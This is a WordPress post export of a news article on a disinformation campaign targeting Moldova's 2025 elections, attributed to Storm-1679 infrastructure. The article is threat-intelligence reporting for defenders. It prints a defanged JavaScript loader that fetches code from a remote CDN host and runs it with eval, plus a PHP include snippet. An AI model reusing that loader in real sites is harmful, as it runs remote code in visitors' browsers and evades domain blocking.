{"id":7189,"date":"2025-09-25T10:03:32","date_gmt":"2025-09-25T10:03:32","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/09\/25\/new-russian-disinformation-campaign-targeting-upcoming-moldovas-elections\/"},"modified":"2025-09-25T10:03:32","modified_gmt":"2025-09-25T10:03:32","slug":"new-russian-disinformation-campaign-targeting-upcoming-moldovas-elections","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/09\/25\/new-russian-disinformation-campaign-targeting-upcoming-moldovas-elections\/","title":{"rendered":"New Russian Disinformation Campaign Targeting Upcoming\u00a0Moldova\u2019s Elections"},"content":{"rendered":"<p>    New Russian Disinformation Campaign Targeting Upcoming\u00a0Moldova\u2019s Elections<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>On the eve of Moldova\u2019s parliamentary elections scheduled for September 28, 2025, cybersecurity researchers have uncovered a sophisticated Russian-backed disinformation campaign designed to undermine public confidence in Moldova\u2019s pro-European leadership.<\/p>\n<p>The campaign began surfacing in April 2025, when analysts first observed a cluster of newly registered domains publishing biased news articles in both Romanian and Russian.<\/p>\n<p>These websites employed identical templates and shared infrastructure with older Russian propaganda outlets, signaling an orchestrated effort to sow discord at a critical juncture in Moldova\u2019s democratic process.<\/p>\n<p>Silent Push analysts identified the campaign through a combination of open-source intelligence and network traffic analysis.<\/p>\n<p>Initial indicators included dozens of URLs hosting political commentary with inflammatory headlines aimed at discrediting the ruling coalition and amplifying calls to pivot back toward Moscow.<\/p>\n<p>Subsequent investigations revealed that these domains resolved to two dedicated IP addresses, both of which had previously hosted content for a 2022 <a href=\"https:\/\/cybersecuritynews.com\/russian-fake-news-network-copycop-added-200-new-websites\/\" target=\"_blank\" rel=\"noreferrer noopener\">disinformation<\/a> operation known as Absatz.<\/p>\n<p>By correlating registration metadata and hosting records, researchers established a clear lineage between the new Moldovan targeting effort and earlier campaigns.<\/p>\n<p>Through deep technical analysis, Silent Push analysts <a href=\"https:\/\/www.silentpush.com\/blog\/storm-1679\/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=storm-1679\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">noted<\/a> that the new sites reused several bespoke functions originally developed for the 2022 effort.<\/p>\n<p>These functions handled content generation, automatic comment moderation, and stealthy redirection of social-media referrals.<\/p>\n<p>Reusing this code not only accelerated deployment but also provided a unique fingerprint enabling researchers to connect the disparate sites.<\/p>\n<p>The technical footprint was especially evident in the PHP module responsible for article templating and URL parameter parsing, which contained the following identifiable snippet:-<\/p>\n<pre class=\"wp-block-code\"><code>[? php\nfunction renderStory($ storyId) {\n    $ seed = 'Storm1679';\n    $ key = substr (md5($ storyId . $ seed), 0, 8);\n    $ templatePath = \"\/var \/www \/html \/templates \/{$ key}_template[.]php\";\n    include($ templatePath);\n}\n?]<\/code><\/pre>\n<p>By comparing hash fragments in each URL, analysts could trace the evolution of the codebase across both the 2022 Absatz infrastructure and the 2025 Moldovan campaign.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-detection-evasion-and-infrastructure-persistence\"><strong>Detection Evasion and Infrastructure Persistence<\/strong><\/h2>\n<p>The campaign\u2019s operators demonstrated advanced <a href=\"https:\/\/cybersecuritynews.com\/detecting-and-responding-to-new-nation-state-persistence-techniques\/\" target=\"_blank\" rel=\"noreferrer noopener\">persistence<\/a> tactics, carefully architecting their infrastructure to evade conventional detection.<\/p>\n<p>Each disinformation website employed a rotating pool of content delivery networks (CDNs) and proxy services to mask origin IPs, falling back to hard-coded backup hosts when a primary node was taken offline.<\/p>\n<p>DNS records were configured with extremely short TTL values\u2014often under five minutes\u2014forcing security teams to constantly refresh caches and complicating takedown efforts.<\/p>\n<p>In one instance, when researchers successfully blocked access to a malicious domain at the ISP level, the site automatically redirected visitors to an alternate domain using a stealth JavaScript loader:<\/p>\n<pre class=\"wp-block-code\"><code>[script]\n  fetch('https:\/\/cdn.cloudproxy[.]net\/get?siteId=42')\n    . then (res =() res[.]text())\n    . then (code =() eval (code));\n[\/script]<\/code><\/pre>\n<p>This loader fetched an obfuscated payload from a third-party CDN, which in turn rehydrated the disinformation site content in the user\u2019s browser without touching the original domain.<\/p>\n<p>By leveraging this dual-stage loading mechanism, the campaign could survive domain blacklisting and continue publishing articles without significant downtime.<\/p>\n<p>To maintain operational security, all command-and-control interactions for new content updates were conducted over TLS-encrypted channels using non-standard ports.<\/p>\n<p>The same ports had been observed in the 2022 Absatz campaign, further cementing the link between the two efforts.<\/p>\n<p>Analysts also noted that social-media amplification relied on low-quality bot accounts programmed to mimic genuine user behavior by varying posting times and interleaving political content with neutral topics like sports or local weather.<\/p>\n<p>As Moldova approaches the polls, this <a href=\"https:\/\/cybersecuritynews.com\/new-malvertising-campaign\/\" target=\"_blank\" rel=\"noreferrer noopener\">campaign<\/a> underscores the importance of technical collaboration and real-time monitoring to defend democratic institutions from covert influence operations.<\/p>\n<p>Silent Push continues to track and mitigate the evolving infrastructure behind the Storm-1679 network, with detailed telemetry available to enterprise customers for <a href=\"https:\/\/cybersecuritynews.com\/threat-intelligence-3\/\" target=\"_blank\" rel=\"noreferrer noopener\">proactive defense<\/a> measures.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 91%,rgb(169,184,195) 100%)\"><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in\u00a0<a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a>.<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/new-russian-disinformation-campaign\/\">New Russian Disinformation Campaign Targeting Upcoming\u00a0Moldova\u2019s Elections<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/new-russian-disinformation-campaign\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>New Russian Disinformation Campaign Targeting Upcoming\u00a0Moldova\u2019s Elections On the eve of Moldova\u2019s parliamentary elections scheduled for September 28, 2025, cybersecurity researchers have uncovered a sophisticated Russian-backed disinformation campaign designed to undermine public confidence in Moldova\u2019s pro-European leadership. The campaign began surfacing in April 2025, when analysts first observed a cluster of newly registered domains publishing [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-7189","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7189"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=7189"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7189\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=7189"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=7189"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=7189"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}